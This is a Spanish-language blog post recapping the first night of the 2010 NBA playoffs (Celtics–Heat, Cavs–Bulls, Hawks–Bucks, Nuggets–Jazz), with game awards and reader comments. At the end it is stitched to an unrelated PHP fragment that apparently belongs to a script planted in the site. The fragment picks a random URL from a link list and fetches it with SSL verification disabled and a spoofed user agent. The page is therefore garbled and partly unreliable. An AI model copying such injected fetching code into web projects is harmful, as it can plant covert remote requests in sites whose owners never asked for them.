Playoffs 17/04/2010: Comienza la batalla

18 de April de 2010 por telekoman

La primera jornada de la postemporada 2010 no dio lugar a ninguna sorpresa ni a una posible victoria foránea. 3 encuentros del Este, donde existe mayor desequilibrio; más el Utah@Denver, lamentablemente sin George Karl en el banquillo. Entre Deer y yo os vamos a contar todo lo que ha pasado esta noche. Despegamos.

Empezó la batalla de forma literal. De protagonista indeseable Kevin Garnett y los Celtics. Nada que ver la espectacular primera ronda del año pasado. Anoche hubo que sacar el mono de trabajo, la cara de perro y las malas maneras a pasear, porque sudaron para doblegar a Wade y a poco más que Wade en el partido más complicado y tenso de la noche.

Muy espesos y nerviosos desde el primer momento, los líderes ofensivos verdes fueron Tony Allen y Glenn Davis. Por parte de los Heat, Wade demasiado solo, con puntuales ayudas de Quentin Richardson. Entre Beasley y Jermaine un pobre 6 de 22. Fue precisamente la defensa lo que salvó a los Celtics… la defensa y el efecto Boston Garden que todavía está plenamente vigente. El perro grande haciendo y deshaciendoLa victoria, no obstante, es pírrica. Garnett fue expulsado tras agredir a Quentin Richardson, con la consiguiente tangana que se organizó. Se espera una dura sanción. Un dato curioso: Nate Robinson no disfrutó ni un solo segundo de juego.

Los Cavs no tuvieron tantos problemas para doblegar fácil a los Bulls. La victoria se cimentó en un primer cuarto demoledor en el que prácticamente aplastaron cualquier atisbo de sorpresa. Sólo Derrick Rose creyó en sus propias posibilidades. El resto estaba entregado a la manifiesta superioridad física de los Cavaliers, con el Perro Grande en medio de la zona y LeBron haciendo y deshaciendo a su antojo. Muy destacable el partido que cuajaron Mo Williams, Jamison y también de Varejao, arrasando bajo tableros.

Tampoco lo pasaron excesivamente mal los Hawks contra Milwaukee. Un partido similar, que se cimentó en una primera parte donde no hubo color. Excelente actuación colectiva de los locales, muy cómodos mirando al aro en todo momento. Jennings se cargó al equipo a la espalda y Salmons puso todo su empeño, pero no estuvo muy fino y los intentos de remontada eran un querer y no poder. Delfino, Stackhouse, Ridnour… no tuvieron su noche, como tampoco los pívots suplentes de los Bucks. Un juguete en manos de Atlanta.

Por último, en el choque más bonito de la noche, los Nuggets echaron mano de un último cuarto prodigioso ofensivamente, cerrándolo en 38 puntos, la mitad de los Heat en todo un partido. Carmelo Anthony estuvo muy suelto sin la presencia de Kirilenko. Lamentablemente las bajas de Utah no quedaron ahí y perderán a Okur lo que queda de playoffs. Mucho me temo que tan sólo ese dato será demasiada losa para levantar. Deron Williams y Boozer plantaron cara, como también lo hicieron Millsap y Korver. No obstante, la teórica igualdad entre los dos equipos tiene toda la pinta de que está inclinándose por momentos hacia el lado de los Nuggets.

PREMIOS

MVP: Varios candidatos al premio empezando por el omnipresente Lebron. Sin embargo éste recae sí o sí sobre su alter ego Carmelo Anthony que le endosó nada más y nada menos que 42 puntos a las Jazz

Rookie: Poca discusión en este apartado. 34 puntitos del amigo Jennings que ahora sí tiene el camino limpio para ser el jefazo de la sección día sí día también. Aunque claro, con sólo 3 asistencias y algún tiro bastante mal elegido (aunque entren) nos hace pensar a más de uno que no es oro todo lo que reluce.

Sorpresa: Poca o ninguna sorpresa nos han deparado hoy los equipos. Lo más destacado en este respecto son los 24 puntos de diferencia que los Hawks lograron durante la segunda parte sobre Milwaukee

Decepción: Tengo un ligero déjà vu en este apartado. ¿No os recuerdan a nada los 8 puntos de Ray Allen en las primeras rondas de playoffs? Claro que el 6 de 22 entre Beasley y Jermaine O’Neal tampoco se queda atrás.

Esfuerzo en vano: Ya pronosticábamos que iba a ser difícil parar a Wade y no nos equivocábamos mucho. 26 puntitos, 8 rebotes y 6 asistencias para el animalico. Claro que los 26 y 11 asistencias de Deron tampoco estuvieron mal. Premio compartido para ellos.

Lo que viene a continuación.

Otros 4 partidos esta noche, donde lo más interesante es la “batalla” que se producirá entre San Antonio y Dallas en casa de estos últimos. Veremos si los refuerzos de Dallas cumplen o ha sido todo un espejismo. Y por supuesto el debut de nuestros dos supervivientes. Gasol y Rudy afrontan este primer partido con objetivos muy diferentes.

Comenta

4 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Ayer viendo el Bulls-Cavs me acordaba un amigo que siempre dice que las estrellas no lo son hasta que lo demuestran en play-offs, coincido bastante con esta afirmación y no me cabe duda de que Derrick Rose va a ser una superestrella de la liga, vaya manera de acojonar a los Cavs en el tercer cuarto. Gracias a los secundarios los Cavs aguantaron ese arreon.

    El año pasado en la serie contra Boston ya se fue a 20 puntos, 6 rebotes y 6 asistencias, desde luego tienen un diamante en Chicago, a ver si saben aprovecharlo antes de que le entren ganas de largarse.

      Citar

  2. Txusma dice:
    #2

    Que tengas razón, Viva! De momento ya está encargada la camiseta negra de los Bulls de Derrick Rose. La pondré al ladito de la de Roy. Vaya par de cracks!

    Por cierto, que rabia me da Garnett. Y me da que este año, al estar mermado físicamente, va a utilizar sus malas artes más aún. Si es que pasa ronda, claro.

      Citar

  3. Love Denise dice:
    #3

    Bueno de momento no ha habido sorpresas, creo que todos “los cabezas de serie” van a pasar a 2º ronda, y ahí empezará lo bueno.

      Citar

  4. Llukas 70 dice:
    #4

    John Wall mejor que Rose?¿

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>